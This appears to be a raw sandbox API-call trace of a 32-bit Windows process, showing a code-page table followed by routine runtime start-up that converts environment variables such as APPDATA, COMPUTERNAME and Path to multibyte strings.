\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿØ:{ÕÜò\x18", lpUsedDefaultChar=0x0) returned 256 [0116.925] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0116.925] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40b5f8 [0116.925] RtlSizeHeap (HeapHandle=0x31d0000, Flags=0x0, MemoryPointer=0x31f0f08) returned 0x80 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0116.926] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1f) returned 0x31eefa0 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x31eefa0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0116.926] GetLastError () returned 0x0 [0116.926] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f11b8, Size=0x8) returned 0x31f11b8 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0116.926] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x36) returned 0x31f11c8 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x31f11c8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0116.926] GetLastError () returned 0x0 [0116.926] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f11b8, Size=0xc) returned 0x31f1208 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0116.926] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x37) returned 0x31f1220 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x31f1220, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0116.926] GetLastError () returned 0x0 [0116.926] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1208, Size=0x10) returned 0x31f1208 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0116.926] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3c) returned 0x31e5830 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x31e5830, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0116.926] GetLastError () returned 0x0 [0116.926] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1208, Size=0x14) returned 0x31f1260 [0116.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0116.926] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x31) returned 0x31f1280 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x31f1280, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0116.927] GetLastError () returned 0x0 [0116.927] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1260, Size=0x18) returned 0x31f1260 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0116.927] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x17) returned 0x31f12c0 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x31f12c0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0116.927] GetLastError () returned 0x0 [0116.927] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1260, Size=0x1c) returned 0x31f12e0 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0116.927] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x24) returned 0x31eaa50 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x31eaa50, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0116.927] GetLastError () returned 0x0 [0116.927] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f12e0, Size=0x20) returned 0x31f12e0 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.927] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x14) returned 0x31f1260 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x31f1260, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0116.927] GetLastError () returned 0x0 [0116.927] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f12e0, Size=0x24) returned 0x31f12e0 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.927] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0xd) returned 0x31ee710 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x31ee710, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0116.927] GetLastError () returned 0x0 [0116.927] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f12e0, Size=0x28) returned 0x31f12e0 [0116.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0116.927] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x25) returned 0x31eaa80 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x31eaa80, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0116.928] GetLastError () returned 0x0 [0116.928] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f12e0, Size=0x2c) returned 0x31f12e0 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0116.928] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x39) returned 0x31e5878 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x31e5878, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0116.928] GetLastError () returned 0x0 [0116.928] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f12e0, Size=0x30) returned 0x31f12e0 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.928] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x18) returned 0x31f1318 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x31f1318, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0116.928] GetLastError () returned 0x0 [0116.928] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f12e0, Size=0x34) returned 0x31f1338 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0116.928] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x17) returned 0x31f12e0 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x31f12e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0116.928] GetLastError () returned 0x0 [0116.928] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1338, Size=0x38) returned 0x31f1338 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0116.928] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0xe) returned 0x31ee728 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x31ee728, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0116.928] GetLastError () returned 0x0 [0116.928] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1338, Size=0x3c) returned 0x31f1338 [0116.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0116.928] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x69) returned 0x31f1380 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x31f1380, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0116.929] GetLastError () returned 0x0 [0116.929] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1338, Size=0x40) returned 0x31f1338 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0116.929] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x3e) returned 0x31e58c0 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x31e58c0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0116.929] GetLastError () returned 0x0 [0116.929] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f1338, Size=0x44) returned 0x31f13f8 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0116.929] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1b) returned 0x31eefc8 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x31eefc8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0116.929] GetLastError () returned 0x0 [0116.929] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x48) returned 0x31f13f8 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0116.929] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1d) returned 0x31eeff0 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x31eeff0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0116.929] GetLastError () returned 0x0 [0116.929] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x4c) returned 0x31f13f8 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0116.929] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x48) returned 0x31e6c58 [0116.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x31e6c58, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0116.929] GetLastError () returned 0x0 [0116.929] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x50) returned 0x31f13f8 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.930] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x12) returned 0x31f1338 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x31f1338, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0116.930] GetLastError () returned 0x0 [0116.930] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x54) returned 0x31f13f8 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0116.930] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x18) returned 0x31f1358 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x31f1358, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0116.930] GetLastError () returned 0x0 [0116.930] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x58) returned 0x31f13f8 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0116.930] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1b) returned 0x31ef018 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x31ef018, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0116.930] GetLastError () returned 0x0 [0116.930] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x5c) returned 0x31f13f8 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0116.930] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x24) returned 0x31eaab0 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x31eaab0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0116.930] GetLastError () returned 0x0 [0116.930] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x60) returned 0x31f13f8 [0116.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0116.930] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x29) returned 0x31eb1c0 [0116.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x31eb1c0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0116.931] GetLastError () returned 0x0 [0116.931] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x64) returned 0x31f13f8 [0116.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0116.931] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x1e) returned 0x31ef040 [0116.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x31ef040, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0116.931] GetLastError () returned 0x0 [0116.931] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x68) returned 0x31f13f8 [0116.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0116.931] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x41) returned 0x31e6ca8 [0116.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x31e6ca8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0116.931] GetLastError () returned 0x0 [0116.931] RtlReAllocateHeap (Heap=0x31d0000, Flags=0x0, Ptr=0x31f13f8, Size=0x6c) returned 0x31f13f8 [0116.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0116.931] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x8, Size=0x17) returned 0x31f1470 [0116.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x31f1470, cbMultiByte=23, lpDefaultChar=0x0, 